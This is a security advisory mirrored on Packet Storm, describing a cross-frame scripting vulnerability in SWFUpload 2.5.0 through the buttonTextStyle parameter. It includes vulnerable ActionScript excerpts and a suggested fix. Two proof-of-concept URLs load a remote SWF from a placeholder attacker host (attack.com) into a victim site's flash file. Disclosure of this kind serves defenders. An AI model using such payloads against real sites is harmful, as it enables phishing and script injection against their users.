exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SWFupload 2.5.0 Cross Frame Scripting

SWFupload 2.5.0 Cross Frame Scripting
Posted Jan 25, 2015
Authored by MindCracker, Vulnerability Laboratory | Site vulnerability-lab.com

SWFupload version 2.5.0 suffers from a cross frame scripting vulnerability.

tags | exploit
SHA-256 | 283ad27ae5c9a13078f97e8a54234064217dd402919457787519f9e2a3593820

SWFupload 2.5.0 Cross Frame Scripting

Change Mirror Download
Document Title:
===============
SWFupload 2.5.0 - Cross Frame Scripting (XFS) Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1422


Release Date:
=============
2015-01-25


Vulnerability Laboratory ID (VL-ID):
====================================
1422


Common Vulnerability Scoring System:
====================================
2.3


Product & Service Introduction:
===============================
SWFUpload is a JavaScript Library that wraps the Flash Player`s upload function. It brings your uploads to the next level with Multiple File Selection,
Upload Progress and Client-side File Size Checking. Unlike other Flash upload tools, SWFUpload leaves the UI in the developer`s hands. Using a set of
event handlers developers can display upload progress and status to the user in their own HTML/CSS UI. SWFUpload has been featured in such
projects as YouTube and WordPress.

(Copy of the Vendor Homepage: http://sourceforge.net/projects/swfupload.mirror/ )


Abstract Advisory Information:
==============================
An indepnedent Vulnerability Laboratory Researcher discovered multiple client-side cross frame scripting vulnerability in the official SWFupload v2.5.0 script.


Vulnerability Disclosure Timeline:
==================================
2015-01-25: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Unpublished


Affected Product(s):
====================
SF-Editor
Product: SWFUpload - JavaScript & Flash Upload Library 2.5.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple Cross Frame Scripting Vulnerabilities has been discovered in the official SWFupload v2.5.0 script.

The cross frame scripting vulnerability occurs when a SWF file has the permission or is able able to load
another file as source of another directory/site.The vulnerable swf file can be exploited by remote attackers
without privileged application user account and low or medium user interaction. As you can see the .buttonTextStyle
variable (view: proof of concept) is not well configured (adding the value) and the ButtonTextStyle will accept
any value. The vulneralbe SWF will loads any file that is getting attached to the parameter by default configuration.
Remote attackers are able to exploit the issue with medium or high user interaction.

The security risk of the client-side cross frame scripting web vulnerability is estimated as medium with a cvss
(common vulnerability scoring system) count of 2.3. Exploitation of the client-side remote vulnerability requires medium
or high user interaction and no privileged application user account. Successful exploitation results in client-side phishing,
client-side external redirects and non-persistent manipulation of affected- or connected module context.

Vulnerable Service(s):
[+] GET

Vulnerable File(s):
[+] buttontextstyle.swf
[+] swfupload.swf

Vulnerable Parameter(s):
[+] buttonTextStyle


Proof of Concept (PoC):
=======================
1.1
The client-side XFS vulnerability can be exploited by remote attackers without privileged application user account and with medium or high user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf[CLIENT-SIDE SCRIPT CODE EXECUTION!]

Vulnerable Code :
ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle);

this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
}
catch(ex:Object)
{
this.SetButtonTextStyle("");
}
try
{



1.2
The client-side XFS vulnerability can be exploited by remote attackers without privileged application user account and with medium or high user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


PoC: http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf[CLIENT-SIDE SCRIPT CODE EXECUTION!]

ExternalInterface.addCallback("SetButtonText",this.SetButtonText);
SetButtonText

{
this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
}
catch(ex:Object)
{
this.SetButtonText("");
}
try
{


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable `buttonTextStyle` value in the buttontextstyle.swf and swfupload.swf files.
Restrict the input to the vulnerable values and disallow special chars. Filter with an own exception-ahndling to prevent execution of client-side injected script codes.


Security Risk:
==============
The security risk of the client-side web vulnerability is estimated as medium.


Credits & Authors:
==================
MindCracker - Team MaDLeeTs (MindCrackerKhan@gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt




Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close